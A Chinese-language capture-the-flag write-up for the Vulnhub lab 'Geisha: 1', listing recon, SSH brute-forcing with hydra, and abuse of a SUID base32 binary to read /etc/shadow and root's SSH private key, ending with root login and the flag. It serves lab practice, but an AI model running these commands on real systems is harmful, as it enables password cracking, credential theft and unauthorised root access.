Geisha: 1 Vulnhub 实战

384 阅读1分钟

​​​​本文已参与「新人创作礼」活动,一起开启掘金创作之路。

信息收集

arp-scan -l

nmap -A 192.168.1.173 -p- -oN nmap.A

gobuster

gobuster dir -u http://192.168.1.173:7125/ -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt

扫描得到/passwd

curl http://192.168.1.173:7125/passwd -o passwd && cat passwd | grep home

攻击

hydra -l geisha -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.173 -o hydra.geisha && cat hydra.geisha

得到账密:

[22][ssh] host: 192.168.1.173   login: geisha   password: letmein

ssh 登录成功

ssh geisha@192.168.1.173

提权

查找具有suid权限的文件

find / -perm -4000 2>/dev/null

使用以下命令,用base32 读取访问受限制的文件 /etc/passwd ,读取成功

base32 "/etc/shadow" | base32 --decode

尝试使用ssh 登录root,使用以下命令获得在/root/.ssh 目录下的root用户登录ssh 的私钥

base32 "/root/.ssh/id_rsa" | base32 --decode

拿到flag

拿到其私钥之后,我们可以直接在本地使用该私钥登录root | ssh

vim root.src.key

chmod 777 root.src.key

ssh root@192.168.1.173 -i root.src.key

flag:

Flag{Sun_CTF_220_5_G31sha}


参考博文:

cyb3rbl0g.github.io/geisha-vuln…